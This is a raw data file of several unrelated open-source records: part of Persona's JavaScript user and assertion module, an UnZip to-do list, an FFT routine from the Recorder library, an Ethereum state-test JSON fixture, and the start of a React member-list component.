Called on XHR failure.\n */\n isEmailRegistered: function(email, onComplete, onFailure) {\n network.emailRegistered(email, onComplete, onFailure);\n },\n\n /**\n * Get information about an email address. Who vouches for it?\n * (is it a primary or a secondary)\n * @method addressInfo\n * @param {string} email - Email address to check.\n * @param {function} [onComplete] - Called with an object on success,\n * containing these properties:\n * type: \n * known: boolean, present if type is secondary. True if email\n * address is registered with BrowserID.\n * auth: string - url to send users for auth - present if type is\n * primary.\n * prov: string - url to embed for silent provisioning - present\n * if type is secondary.\n * @param {function} [onFailure] - Called on XHR failure.\n */\n addressInfo: function(email, onComplete, onFailure) {\n function complete(info) {\n // key off of both the normalized email entered typed email so\n // that the cache is maximally effective.\n addressCache[email] = info;\n addressCache[info.email] = info;\n onComplete && onComplete(info);\n }\n\n if (addressCache[email]) {\n return complete(addressCache[email]);\n }\n\n network.addressInfo(email, User.rpInfo.getIssuer(), function(info) {\n // update the email with the normalized email if it is available.\n // The normalized email is stored in the cache.\n var normalizedEmail = info.normalizedEmail || email;\n info.email = normalizedEmail;\n User.checkForInvalidCerts(normalizedEmail, info, function(cleanedInfo) {\n if (cleanedInfo.type === \"primary\") {\n cleanedInfo.idpName = _.escape(getIdPName(cleanedInfo));\n complete(cleanedInfo);\n }\n else {\n complete(cleanedInfo);\n }\n });\n }, onFailure);\n },\n\n /**\n * Checks for outdated certificates and clears them from storage.\n * Returns original info, may have been altered\n * @param {string} email - Email address to check.\n * @param {object} info - Output from addressInfo callback\n * @param {function} done - called with object when complete.\n */\n checkForInvalidCerts: function(email, info, done) {\n function clearCert(email, idInfo) {\n delete idInfo.priv;\n delete idInfo.cert;\n delete primaryAuthCache[email];\n storage.addEmail(email, idInfo);\n }\n\n cryptoLoader.load(function(jwcrypto) {\n var record = User.getStoredEmailKeypair(email);\n\n if (!(record && record.cert)) return complete(done, info);\n\n var prevIssuer;\n try {\n prevIssuer =\n jwcrypto.extractComponents(record.cert).payload.iss;\n } catch (e) {\n // error parsing the certificate! Maybe it's of an\n // old/different format? clear cert.\n helpers.log(\"Looking for issuer, \" +\n \"error parsing cert for\"+ email +\":\" + String(e));\n clearCert(email, record);\n }\n\n // If the address is vouched for by the fallback IdP, the issuer will\n // be the fallback IdP. This takes care of addresses that are\n // beginning the transition state.\n if (info.issuer !== prevIssuer) {\n // issuer has changed... clear cert.\n clearCert(email, record);\n\n // If the issuer has changed, then silent assertions should not be\n // generated until the user verifies with the new issuer. Keep tabs\n // getSilentAssertion will handle this. If there is no prevIssuer,\n // the user has no cert, and there is no problem.\n info.issuerChange = !!prevIssuer;\n }\n else if (record.unverified && \"unverified\" !== info.state) {\n // cert was created with an unverified email but the email\n // is now verified... clear cert.\n clearCert(email, record);\n }\n else if (isTransitioning(info.state)) {\n // On a transition, issuer MUST have changed... clear cert\n clearCert(email, record);\n }\n complete(done, info);\n });\n },\n\n /**\n * Add an email address to an already created account. Sends address and\n * keypair to the server, user then needs to verify account ownership. This\n * does not add the new email address/keypair to the local list of\n * valid identities.\n * @method addEmail\n * @param {string} email\n * @param {string} password\n * @param {function} [onComplete] - Called on successful completion.\n * @param {function} [onFailure] - Called on error.\n */\n addEmail: function(email, password, onComplete, onFailure) {\n stageAddressVerification(email, password,\n network.addSecondaryEmail.bind(network, email, password, User.rpInfo),\n onComplete, onFailure);\n },\n\n /**\n * Check whether a password is needed to add a secondary email address to\n * an already existing account.\n * @method passwordNeededToAddSecondaryEmail\n * @param {function} [onComplete] - Called on successful completion, called\n * with true if password is needed, false otw.\n * @param {function} [onFailure] - Called on error.\n */\n passwordNeededToAddSecondaryEmail: function(onComplete, onFailure) {\n withContext(function(ctx) {\n complete(onComplete, !ctx.has_password);\n }, onFailure);\n },\n\n /**\n * Wait for the email registration to complete\n * @method waitForEmailValidation\n * @param {string} email - email address to check.\n * @param {function} [onSuccess] - Called to give status updates.\n * @param {function} [onFailure] - Called on error.\n */\n waitForEmailValidation: addressVerificationPoll.curry(network.checkEmailRegistration),\n\n /**\n * Cancel the waitForEmailValidation poll\n * @method cancelEmailValidation\n */\n cancelEmailValidation: cancelRegistrationPoll,\n\n /**\n * Verify a users email address given by the token\n * @method verifyEmail\n * @param {string} token\n * @param {string} password\n * @param {function} [onComplete] - Called on completion.\n * Called with an object with valid, email, and origin if valid, called\n * with valid=false otw.\n * @param {function} [onFailure] - Called on error.\n */\n verifyEmail: completeAddressVerification.curry(network.completeEmailRegistration),\n\n /**\n * Remove an email address.\n * @method removeEmail\n * @param {string} email - Email address to remove.\n * @param {function} [onComplete] - Called when complete.\n * @param {function} [onFailure] - Called on error.\n */\n removeEmail: function(email, onComplete, onFailure) {\n var issuer = User.rpInfo.getIssuer();\n if (storage.getEmail(email, issuer)) {\n network.removeEmail(email, function() {\n storage.removeEmail(email, issuer);\n complete(onComplete);\n }, onFailure);\n } else if (onComplete) {\n onComplete();\n }\n },\n\n /**\n * Sync an identity with the server. Creates and stores locally and on the\n * server a keypair for the given email address.\n * @method syncEmailKeypair\n * @param {string} email - Email address.\n * @param {function} [onComplete] - Called on completion. Called with\n * status parameter - true if successful, false otw.\n * @param {function} [onFailure] - Called on error.\n */\n syncEmailKeypair: function(email, onComplete, onFailure) {\n // jwcrypto depends on a random seed being set to generate a keypair.\n // The seed is set with a call to withContext. Ensure the\n // random seed is set before continuing or else the seed may not be set,\n // the key never created, and the onComplete callback never called.\n withContext(function() {\n cryptoLoader.load(function(jwcrypto) {\n jwcrypto.generateKeypair({algorithm: \"DS\", keysize: bid.KEY_LENGTH}, function(err, keypair) {\n certifyEmailKeypair(email, keypair, onComplete, onFailure);\n });\n });\n });\n },\n\n\n /**\n * Get an assertion for an identity, optionally backed by a specific issuer\n * @method getAssertion\n * @param {string} email - Email to get assertion for.\n * @param {string} audience - Audience to use for the assertion.\n * @param {function} [onComplete] - Called with assertion, null otw.\n * @param {function} [onFailure] - Called on error.\n */\n getAssertion: function(email, audience, onComplete, onFailure) {\n var issuer = User.rpInfo.getIssuer(),\n storedID = storage.getEmail(email, issuer),\n userAssertedClaims = User.rpInfo.getUserAssertedClaims() || {},\n assertion;\n\n function createAssertion(idInfo) {\n // we use the current time from the browserid servers\n // to avoid issues with clock drift on user's machine.\n // (issue #329)\n withContext(function(userContext, networkContext) {\n var serverTime = networkContext.getServerTime();\n cryptoLoader.load(function(jwcrypto) {\n var sk = jwcrypto.loadSecretKeyFromObject(idInfo.priv);\n\n // assertions are valid for 2 minutes\n var expirationMS = serverTime.getTime() + (2 * 60 * 1000);\n var expirationDate = new Date(expirationMS);\n\n // yield to the render thread, important on IE8 so we don't\n // raise \"script has become unresponsive\" errors.\n setTimeout(function() {\n jwcrypto.assertion.sign(\n userAssertedClaims, {audience: audience, expiresAt: expirationDate},\n sk,\n function(err, signedAssertion) {\n assertion = jwcrypto.cert.bundle([idInfo.cert], signedAssertion);\n storage.site.set(audience, \"email\", email);\n // issuer is used for B2G to get silent assertions to get\n // assertions backed by certs from a special issuer.\n storage.site.set(audience, \"issuer\", issuer);\n\n /**\n * If a user who signs with a primary address is not authenticated to Persona,\n * an assertion is first generated with the audience login.persona.org to sign the user\n * into Persona, another assertion is generated to sign the user into the RP. The cert should\n * be removed after generating the assertion for the RP.\n */\n if (audience !== PERSONA_ORG_AUDIENCE && !storage.usersComputer.confirmed(email)) {\n // If the user has not confirmed that this is their\n // computer, immediately invalidate the cert so that nobody\n // else can sign in using this address.\n storage.invalidateEmail(email);\n }\n complete(onComplete, assertion);\n });\n }, 0);\n });\n }, onFailure);\n }\n\n if (storedID) {\n if (storedID.priv) {\n // parse the secret key\n // yield to the render thread!\n setTimeout(function() {\n createAssertion(storedID);\n }, 0);\n }\n else {\n User.addressInfo(email, function(info) {\n if (info.type === \"primary\" && User.rpInfo.isDefaultIssuer()) {\n // first we have to get the address info, then attempt\n // a provision, then if the user is provisioned, go and get an\n // assertion.\n User.provisionPrimaryUser(email, info, function(status) {\n if (status === \"primary.verified\") {\n User.getAssertion(email, audience, onComplete, onFailure);\n }\n else {\n complete(onComplete, null);\n }\n }, onFailure);\n }\n else {\n // we have no key for this identity, go generate the key,\n // sync it and then get the assertion recursively.\n User.syncEmailKeypair(email, function(status) {\n User.getAssertion(email, audience, onComplete, onFailure);\n }, onFailure);\n }\n }, onFailure);\n }\n }\n else {\n complete(onComplete, null);\n }\n },\n\n /**\n * Get the list of identities stored locally.\n * @method getStoredEmailKeypairs\n * @return {object} identities.\n */\n getStoredEmailKeypairs: function() {\n return storage.getEmails(User.rpInfo.getIssuer());\n },\n\n /**\n * Get the list of identities sorted by address.\n * @method getSortedEmailKeypairs\n * @return {array} of objects, with two fields, address, data\n */\n getSortedEmailKeypairs: function() {\n var identities = User.getStoredEmailKeypairs(),\n sortedIdentities = [];\n\n for(var key in identities) {\n if (identities.hasOwnProperty(key)) {\n sortedIdentities.push({ address: key, info: identities[key] });\n }\n }\n\n sortedIdentities.sort(function(a, b) {\n var retval = a.address > b.address ? 1 : a.address < b.address ? -1 : 0;\n return retval;\n });\n\n return sortedIdentities;\n },\n\n /**\n * Get an individual stored identity.\n * @method getStoredEmailKeypair\n * @return {object} identity information for email, if exists, undefined\n * otw.\n */\n getStoredEmailKeypair: function(email) {\n return storage.getEmail(email, User.rpInfo.getIssuer());\n },\n\n /**\n * Clear the list of identities stored locally.\n * @method clearStoredEmailKeypairs\n */\n clearStoredEmailKeypairs: function() {\n storage.clear();\n },\n\n /**\n * Get an assertion for the current domain if the user is signed into it\n * @method getSilentAssertion\n * @param {function} onComplete - called on completion. Called with an\n * an email and assertion if successful, null otw.\n * @param {function} onFailure - called on XHR failure.\n */\n getSilentAssertion: function(siteSpecifiedEmail, onComplete, onFailure) {\n /**\n * Here is everything I know about silent assertions.\n *\n * getSilentAssertion is used in both the communication_iframe and the\n * internal_api to get assertions. Silent assertions drive the .watch\n * API which in turn drives .get and .getVerifiedEmail.\n *\n * Silent assertions are supposed to be fetched under the following\n * conditions (AND):\n * 1) The user is signed in to Persona.\n * 2) Persona believes the user is signed in to the current site.\n * 3) The address in #2 is different to siteSpecifiedEmail. If the\n * addresses are the same, call onComplete with (email, null) to\n * specify \"we agree with you\"\n * 4) The address in #2 is not in a transition state. If the address is\n * in a transition state, the user must go to the dialog to see\n * messaging and possibly verify their email address.\n * 5) A cert must exist or be able to be created for the address in #2.\n * If a cert does not currently exist, try to fetch one from the\n * backing IdP. This allows an assertion to be generated for two\n * scenarios: a) a cert has expired but the IdP allows the user\n * to create one. b) a cert does not exist, but the IdP allows\n * the user to create one. Case b is used with\n * post-verification redirect and the .watch API.\n *\n * If any of the conditions are not met, call onComplete with a null\n * assertion.\n *\n * There are 3 transition states:\n * 1) transition_to_primary - an address that is marked as a \"secondary\"\n * is now backed by a primary IdP. The user should see messaging\n * that says they will authenticate with the IdP instead of\n * Persona.\n * 2) transition_to_secondary - an address that is marked as a \"primary\"\n * no longer has primary IdP backing. It must be vouched for by\n * the fallback IdP. The user already has a Persona password.\n * The user should see messaging that explains to them they use\n * their Persona password, they then type their Persona password\n * and verify their ownership of the address via an email\n * verification.\n * 3) transition_no_password - an address that is marked as a \"primary\"\n * no longer has primary IdP backing. It must be vouched for by\n * the fallback IdP. The user must set a Persona password. The user\n * should see messaging that explains to them they use their\n * Persona password for this address. The user sets a new password\n * and must verify their email address.\n *\n * In any transition state, the user has to see some messaging and\n * possibly verify their email address. No assertion should be generated.\n */\n var rpInfo = User.rpInfo;\n User.checkAuthenticationAndSync(function(authenticated) {\n var origin = rpInfo.getOrigin();\n var loggedInEmail = storage.site.get(origin, \"logged_in\");\n if (!loggedInEmail) {\n loggedInEmail = storage.site.get(origin, \"one_time\");\n }\n // User is not signed in to Persona or not signed into the site.\n if (!(authenticated && loggedInEmail))\n return complete(onComplete, null, null);\n\n User.resetCaches();\n User.addressInfo(loggedInEmail, function(info) {\n // If the address is in a transition state, the user must see\n // messaging in the dialog before continuing.\n if (isTransitioning(info.state))\n return complete(onComplete, null, null);\n\n // If there has not been an issuer change and Persona's view of the\n // world agrees with the sites, then skip assertion generation.\n if (( ! info.issuerChange)\n && (loggedInEmail === siteSpecifiedEmail)) {\n return complete(onComplete, loggedInEmail, null);\n }\n\n // Try to fetch an assertion. If a cert for the address exists or\n // if one can be signed by the backing IdP, an assertion will be\n // generated.\n // If there has been an issuer change, this will check with the new\n // issuer to make sure the user is authenticated there.\n User.getAssertion(loggedInEmail, origin, function(assertion) {\n if (assertion) {\n storage.site.remove(origin, \"one_time\");\n }\n complete(onComplete, assertion ? loggedInEmail : null, assertion);\n }, onFailure);\n });\n }, onFailure);\n },\n\n /**\n * Clear the persistent signin field for the current origin\n * @method logout\n * @param {function} onComplete - called on completion. Called with\n * a boolean, true if successful, false otw.\n * @param {function} onFailure - called on XHR failure.\n */\n logout: function(onComplete, onFailure) {\n var rpInfo = User.rpInfo;\n User.checkAuthentication(function(authenticated) {\n if (authenticated) {\n storage.site.remove(rpInfo.getOrigin(), \"logged_in\");\n }\n\n if (onComplete) {\n onComplete(!!authenticated);\n }\n }, onFailure);\n },\n\n /**\n * Set whether the user owns the computer or not.\n * @method setComputerOwnershipStatus\n * @param {boolean} userOwnsComputer - true if user owns computer, false otw.\n * @param {function} onComplete - called on successful completion.\n * @param {function} onFailure - called on XHR failure.\n */\n setComputerOwnershipStatus: function(userOwnsComputer, onComplete, onFailure) {\n withContext(function(context) {\n if (context.isUserAuthenticated()) {\n if (userOwnsComputer) {\n storage.usersComputer.setConfirmed(context.getUserId());\n network.prolongSession(onComplete, onFailure);\n }\n else {\n storage.usersComputer.setDenied(context.getUserId());\n complete(onComplete);\n }\n } else {\n complete(onFailure, \"user is not authenticated\");\n }\n }, onFailure);\n },\n\n /**\n * Check if the user owns the computer\n * @method isUsersComputer\n */\n isUsersComputer: function(onComplete, onFailure) {\n withContext(function(context) {\n if (context.isUserAuthenticated()) {\n complete(onComplete, storage.usersComputer.confirmed(context.getUserId()));\n } else {\n complete(onFailure, \"user is not authenticated\");\n }\n }, onFailure);\n },\n\n /**\n * Check whether the user should be asked if this is their computer\n * @method shouldAskIfUsersComputer\n */\n shouldAskIfUsersComputer: function(onComplete, onFailure) {\n withContext(function(context) {\n if (context.isUserAuthenticated()) {\n // A user should never be asked if they completed an email\n // registration/validation in this dialog session.\n var shouldAsk = storage.usersComputer.shouldAsk(context.getUserId())\n && !registrationComplete;\n complete(onComplete, shouldAsk);\n } else {\n complete(onFailure, \"user is not authenticated\");\n }\n }, onFailure);\n },\n\n /**\n * Mark the transition state of this user as having been completed.\n * @method usedAddressAsPrimary\n */\n usedAddressAsPrimary: function(email, onComplete, onFailure) {\n User.checkAuthentication(function(authenticated) {\n if (authenticated) {\n network.usedAddressAsPrimary(email, onComplete, onFailure);\n }\n else complete(onFailure, \"user is not authenticated\");\n }, onFailure);\n }\n };\n\n return User;\n}());\n"} {"text": "================================\nFor UnZip 6.0/6.1/who knows:\n================================\n\n o implement handling of file sizes beyond the 32-bit limit of\n 2GByte (resp. 4GByte), using the new 64-bit extra field extensions\n as defined by PKWARE (this will not get implemented for the present\n 16-bit ports - plain DOS and OS/2 1.x)\n\n top of the list for 6.0!\n\n o add multi-part zipfile handling\n\n major feature for 6.0!\n\n o add new low-level, binary API; rewrite \"normal\" (command-line) UnZip\n to use it\n\n very soon (maybe 6.1)\n\n o use (simple!) configure script in combination with Unix Makefile\n\n very soon (6.0 or 6.1)\n\n o add precautions against extracting files outside the tree below\n the current directory resp. the specified extraction folder.\n (automatically remove absolute path specs from zip entries; emit\n warnings when traversing outside the extraction tree...)\n\n o MSDOS/WIN32/others: detection of \"reserved\" names (= names of character\n devices, or system extensions that look like a characters device driver)\n at runtime; with the goal of emitting \"meaningful\" error messages and/or\n rename queries.\n (Currently, these reserved names are catched as \"non-deletable files\".\n On MSDOS and WIN32, when the RTL stat() function allows to identify\n character devices, the \"reserved\" names are automatically prefixed with\n an underscore.)\n\n o redesign \"file exists -- is newer/older -- overwrite/skip/rename\"\n logic in extract.c and the corresponding system specific mapname()\n services; to prevent superfluous decryption key prompts for entry\n that will be skipped, later.\n\n o rewrite to use fread/fseek/etc. [eventually: test\n write(bytes) vs. fwrite(words), especially on Crays/Alphas]\n\n soon (probably in conjunction with multi-part handling)\n\n o incorporate new backfill version of inflate()\n\n wait for zlib version\n\n o check NEXTBYTE for EOF in crypt.c, funzip.c and explode.c, too\n\n whenever\n\n o add option to force completely non-interactive operation (no queries\n for overwrite/rename, password, etc.); also allow some sort of non-\n interactive password provision? (file? command-line? env. variable?)\n\n someday?\n\n o add testing of extra fields (if have CRC)\n\n later\n\n o rewrite to allow use as a filter\n\n way, way later...\n\n o add Unix hard-link support?\n\n way, way later...\n\n o add \".ini\" file support as a (more elaborate) alternative to the presently\n supported preconfiguring abilities via special environment variables\n (UNZIP on many systems...)?\n\n way, way later (if ever)...\n\n o add option to search zipfile contents for a string and print the\n results? (\"zipgrep\" option--e.g., unzip -g or unzip -S) (easy for\n fixed strings, hard for wildcards/true regex's)\n\n way, way later, if at all...probably use libregex\n\n o add -y \"display symlinks\" option to zipinfo? various sorting options?\n (-St date/time, -Sn name)?\n\n who knows\n\n o add \"in-depth\" option to zipinfo? (check local headers against\n central, etc.)--make it a better debugging tool (or just create\n zipfix)\n\n who knows (zip -F, -FF already exist)\n\nSome maintenance or OS specific topics for 6.0 release:\n\n * add \"unix-style-path -> partitioned-dataset filename\" conversion\n to MVS port\n\n * should we add support for (null) entry names (empty entry name field), to\n conform to the PKWARE specification?\n\n\n=======================================\n\nRequested features:\n\n - extract or exclude on basis of UID [Armin Bub, Armin.Bub@bk.bosch.de, 970904]\n\n=======================================\n\n o miscellaneous little stuff: whenever\n --------------------------\n\n - add support for setting directory time stamps to win32 port. This requires\n a solution similar to the UNIX SET_DIR_ATTRIB optional code; maybe, it could\n be combined with the delayed restoring of directory ACLs. Unfortunately,\n the simple version used in the OS/2 case (setting dir time stamp just after\n creating the directory) does not work, because WinNT updates directory\n change times whenever the directory content gets modified (addition,\n deletion, rename, file change), at least for NTFS file systems.\n (SPC, 2000-11-16)\n\n - change DOS -f/-u stuff to use DOS API for getting filetimes, not stat()\n\n - add (-N?) option to lose all user input and/or switch to \"(*input)()\"\n function, replaceable by UzpAltMain() param\n - add -@ option to read from stdin (zip) or from file (PKZIP)? (go32 built-in)\n - add -oo option to overwrite OS/2 and DOS system and hidden files, too\n - add option to compute MD5 checksum on files and/or on entire zipfile?\n\n - decide whether to use WinGUI \"skipping\" diagnostics in extract.c\n - combine \"y/n/A/N\" query/response stuff into unified section with query\n function(s) (InputFn?)\n - disable ^V code in remaining mapname() routines\n\n - change filename-matching logic so case-insensitive if case-sensitive fails?\n\n - allow multiple dir creation with -d option? [Bob Maynard]\n\n - use gcc -pg, gprof to do profiling on unzip\n\n - Doug Patriarche (doug.patriarche.bvdhp01@nt.com) Northern Telecom Canada Ltd.\n \"I need to do a port of zip/unzip for Wind River Systems' VxWorks OS\"\n [GRR: 15 March 95 -> \"early June\"]\n\n\nFeatures from old BUGS file (mostly duplicates of other entries above):\n\n - ignore case for internal filename match on non-Unix systems, unless file-\n specs enclosed in single quotes\n - modify to decompress input stream if part of a pipe, but continue using\n central directory if not (BIG job!)--extended local header capability\n - add zipinfo option(s) to sort alphabetically, by date/time, in reverse, etc.\n - when listing filenames, use '?' for non-printables? [Thomas Wolff, 92.6.1]\n - add zipinfo \"in-depth\" option? (check local vs. central filenames, etc.)\n - create zipcat program to concatenate zipfiles\n - add -oo option (overwrite and override)? no user queries (if bad password,\n skip file; if disk full, take default action; if VMS special on non-VMS,\n unpack anyway; etc.)\n - add -Q[Q[Q]] option (quiet mode on comments, cautions, warnings and errors)?\n forget -oo, or make synonym? Default level -Q?\n"} {"text": "/*\r\n时域转频域,快速傅里叶变换(FFT)\r\nhttps://github.com/xiangyuecn/Recorder\r\n\r\nvar fft=Recorder.LibFFT(bufferSize)\r\n\tbufferSize取值2的n次方\r\n\r\nfft.bufferSize 实际采用的bufferSize\r\nfft.transform(inBuffer)\r\n\tinBuffer:[Int16,...] 数组长度必须是bufferSize\r\n\t返回[Float64(Long),...],长度为bufferSize/2\r\n*/\r\n\r\n/*\r\n从FFT.java 移植,Java开源库:jmp123 版本0.3\r\nhttps://www.iteye.com/topic/851459\r\nhttps://sourceforge.net/projects/jmp123/files/\r\n*/\r\nRecorder.LibFFT=function(bufferSize){\r\n\t\"use strict\";\r\n\t\r\n\tvar FFT_N_LOG,FFT_N,MINY;\r\n\tvar real, imag, sintable, costable;\r\n\tvar bitReverse;\r\n\r\n\tvar FFT_Fn=function(bufferSize) {//bufferSize只能取值2的n次方\r\n\t\tFFT_N_LOG=Math.round(Math.log(bufferSize)/Math.log(2));\r\n\t\tFFT_N = 1 << FFT_N_LOG;\r\n\t\tMINY = ((FFT_N << 2) * Math.sqrt(2));\r\n\t\t\r\n\t\treal = [];\r\n\t\timag = [];\r\n\t\tsintable = [0];\r\n\t\tcostable = [0];\r\n\t\tbitReverse = [];\r\n\r\n\t\tvar i, j, k, reve;\r\n\t\tfor (i = 0; i < FFT_N; i++) {\r\n\t\t\tk = i;\r\n\t\t\tfor (j = 0, reve = 0; j != FFT_N_LOG; j++) {\r\n\t\t\t\treve <<= 1;\r\n\t\t\t\treve |= (k & 1);\r\n\t\t\t\tk >>>= 1;\r\n\t\t\t}\r\n\t\t\tbitReverse[i] = reve;\r\n\t\t}\r\n\r\n\t\tvar theta, dt = 2 * Math.PI / FFT_N;\r\n\t\tfor (i = (FFT_N >> 1) - 1; i > 0; i--) {\r\n\t\t\ttheta = i * dt;\r\n\t\t\tcostable[i] = Math.cos(theta);\r\n\t\t\tsintable[i] = Math.sin(theta);\r\n\t\t}\r\n\t}\r\n\r\n\t/*\r\n\t用于频谱显示的快速傅里叶变换 \r\n inBuffer 输入FFT_N个实数,返回 FFT_N/2个输出值(复数模的平方)。 \r\n\t*/\r\n\tvar getModulus=function(inBuffer) {\r\n\t\tvar i, j, k, ir, j0 = 1, idx = FFT_N_LOG - 1;\r\n\t\tvar cosv, sinv, tmpr, tmpi;\r\n\t\tfor (i = 0; i != FFT_N; i++) {\r\n\t\t\treal[i] = inBuffer[bitReverse[i]];\r\n\t\t\timag[i] = 0;\r\n\t\t}\r\n\r\n\t\tfor (i = FFT_N_LOG; i != 0; i--) {\r\n\t\t\tfor (j = 0; j != j0; j++) {\r\n\t\t\t\tcosv = costable[j << idx];\r\n\t\t\t\tsinv = sintable[j << idx];\r\n\t\t\t\tfor (k = j; k < FFT_N; k += j0 << 1) {\r\n\t\t\t\t\tir = k + j0;\r\n\t\t\t\t\ttmpr = cosv * real[ir] - sinv * imag[ir];\r\n\t\t\t\t\ttmpi = cosv * imag[ir] + sinv * real[ir];\r\n\t\t\t\t\treal[ir] = real[k] - tmpr;\r\n\t\t\t\t\timag[ir] = imag[k] - tmpi;\r\n\t\t\t\t\treal[k] += tmpr;\r\n\t\t\t\t\timag[k] += tmpi;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tj0 <<= 1;\r\n\t\t\tidx--;\r\n\t\t}\r\n\r\n\t\tj = FFT_N >> 1;\r\n\t\tvar outBuffer=new Float64Array(j);\r\n\t\t/*\r\n\t\t * 输出模的平方:\r\n\t\t * for(i = 1; i <= j; i++)\r\n\t\t * \tinBuffer[i-1] = real[i] * real[i] + imag[i] * imag[i];\r\n\t\t * \r\n\t\t * 如果FFT只用于频谱显示,可以\"淘汰\"幅值较小的而减少浮点乘法运算. MINY的值\r\n\t\t * 和Spectrum.Y0,Spectrum.logY0对应.\r\n\t\t */\r\n\t\tsinv = MINY;\r\n\t\tcosv = -MINY;\r\n\t\tfor (i = j; i != 0; i--) {\r\n\t\t\ttmpr = real[i];\r\n\t\t\ttmpi = imag[i];\r\n\t\t\tif (tmpr > cosv && tmpr < sinv && tmpi > cosv && tmpi < sinv)\r\n\t\t\t\toutBuffer[i - 1] = 0;\r\n\t\t\telse\r\n\t\t\t\toutBuffer[i - 1] = Math.round(tmpr * tmpr + tmpi * tmpi);\r\n\t\t}\r\n\t\treturn outBuffer;\r\n\t}\r\n\t\r\n\tFFT_Fn(bufferSize);\r\n\treturn {transform:getModulus,bufferSize:FFT_N};\r\n};\r\n"} {"text": "{\n \"callcallcallcode_ABCB_RECURSIVE\" : {\n \"_info\" : {\n \"comment\" : \"\",\n \"filledwith\" : \"testeth 1.6.0-alpha.0-11+commit.978e68d2\",\n \"lllcversion\" : \"Version: 0.5.0-develop.2018.11.9+commit.9709dfe0.Linux.g++\",\n \"source\" : \"src/GeneralStateTestsFiller/stCallCodes/callcallcallcode_ABCB_RECURSIVEFiller.json\",\n \"sourceHash\" : \"a4d748d448f89fa8b97452061e741e6023c3be55d99a8116dd0641a7502532ad\"\n },\n \"env\" : {\n \"currentCoinbase\" : \"0x2adc25665018aa1fe0e6bc666dac8fc2697ff9ba\",\n \"currentDifficulty\" : \"0x20000\",\n \"currentGasLimit\" : \"0xb2d05e00\",\n \"currentNumber\" : \"0x01\",\n \"currentTimestamp\" : \"0x03e8\",\n \"previousHash\" : \"0x5e20a0453cecd065ea59c37ac63e079ee08998b6045136a8ce6635c7912ec0b6\"\n },\n \"post\" : {\n \"Byzantium\" : [\n {\n \"hash\" : \"0xd60f0feab4578b9374bf7263fe10d917b70201b56524b1b0f5543abd16635e7d\",\n \"indexes\" : {\n \"data\" : 0,\n \"gas\" : 0,\n \"value\" : 0\n },\n \"logs\" : \"0x1dcc4de8dec75d7aab85b567b6ccd41ad312451b948a7413f0a142fd40d49347\"\n }\n ],\n \"Constantinople\" : [\n {\n \"hash\" : \"0x6a331b0e0d31baa1b8fe27d9ae7a63a00948a560d1592bf2e905c6fe005a8271\",\n \"indexes\" : {\n \"data\" : 0,\n \"gas\" : 0,\n \"value\" : 0\n },\n \"logs\" : \"0x1dcc4de8dec75d7aab85b567b6ccd41ad312451b948a7413f0a142fd40d49347\"\n }\n ],\n \"ConstantinopleFix\" : [\n {\n \"hash\" : \"0xd60f0feab4578b9374bf7263fe10d917b70201b56524b1b0f5543abd16635e7d\",\n \"indexes\" : {\n \"data\" : 0,\n \"gas\" : 0,\n \"value\" : 0\n },\n \"logs\" : \"0x1dcc4de8dec75d7aab85b567b6ccd41ad312451b948a7413f0a142fd40d49347\"\n }\n ],\n \"Frontier\" : [\n {\n \"hash\" : \"0x5cfc164fa79f7a1ed6e4c96e479a96efdb50a7c14eb59af4016b1f0de169504e\",\n \"indexes\" : {\n \"data\" : 0,\n \"gas\" : 0,\n \"value\" : 0\n },\n \"logs\" : \"0x1dcc4de8dec75d7aab85b567b6ccd41ad312451b948a7413f0a142fd40d49347\"\n }\n ]\n },\n \"pre\" : {\n \"0x1000000000000000000000000000000000000000\" : {\n \"balance\" : \"0x0de0b6b3a7640000\",\n \"code\" : \"0x6040600060406000600073100000000000000000000000000000000000000163017d7840f1600055\",\n \"nonce\" : \"0x00\",\n \"storage\" : {\n }\n },\n \"0x1000000000000000000000000000000000000001\" : {\n \"balance\" : \"0x02540be400\",\n \"code\" : \"0x60406000604060006000731000000000000000000000000000000000000002620f4240f1600155\",\n \"nonce\" : \"0x00\",\n \"storage\" : {\n }\n },\n \"0x1000000000000000000000000000000000000002\" : {\n \"balance\" : \"0x02540be400\",\n \"code\" : \"0x604060006040600060007310000000000000000000000000000000000000016207a120f2600255\",\n \"nonce\" : \"0x00\",\n \"storage\" : {\n }\n },\n \"0xa94f5374fce5edbc8e2a8697c15331677e6ebf0b\" : {\n \"balance\" : \"0x0de0b6b3a7640000\",\n \"code\" : \"\",\n \"nonce\" : \"0x00\",\n \"storage\" : {\n }\n }\n },\n \"transaction\" : {\n \"data\" : [\n \"0x\"\n ],\n \"gasLimit\" : [\n \"0x01c9c380\"\n ],\n \"gasPrice\" : \"0x01\",\n \"nonce\" : \"0x00\",\n \"secretKey\" : \"0x45a915e4d060149eb4365960e6a7a45f334393093061116b197e3240065ff2d8\",\n \"to\" : \"0x1000000000000000000000000000000000000000\",\n \"value\" : [\n \"0x00\"\n ]\n }\n }\n}"} {"text": "/*\nCopyright 2015, 2016 OpenMarket Ltd\nCopyright 2017 Vector Creations Ltd\nCopyright 2017, 2018 New Vector Ltd\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n*/\n\nimport React from 'react';\nimport { _t } from '../../../languageHandler';\nimport SdkConfig from '../../../SdkConfig';\nimport dis from '../../../dispatcher/dispatcher';\nimport {isValid3pidInvite} from \"../../../RoomInvite\";\nimport rate_limited_func from \"../../../ratelimitedfunc\";\nimport {MatrixClientPeg} from \"../../../MatrixClientPeg\";\nimport * as sdk from \"../../../index\";\nimport {CommunityPrototypeStore} from \"../../../stores/CommunityPrototypeStore\";\nimport BaseCard from \"../right_panel/BaseCard\";\nimport {RightPanelPhases} from \"../../../stores/RightPanelStorePhases\";\n\nconst INITIAL_LOAD_NUM_MEMBERS = 30;\nconst INITIAL_LOAD_NUM_INVITED = 5;\nconst SHOW_MORE_INCREMENT = 100;\n\n// Regex applied to filter our punctuation in member names before applying sort, to fuzzy it a little\n// matches all ASCII punctuation: !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~\nconst SORT_REGEX = /[\\x21-\\x2F\\x3A-\\x40\\x5B-\\x60\\x7B-\\x7E]+/g;\n\nexport default class MemberList extends React.Component {\n constructor(props) {\n super(props);\n\n const cli = MatrixClientPeg.get();\n if 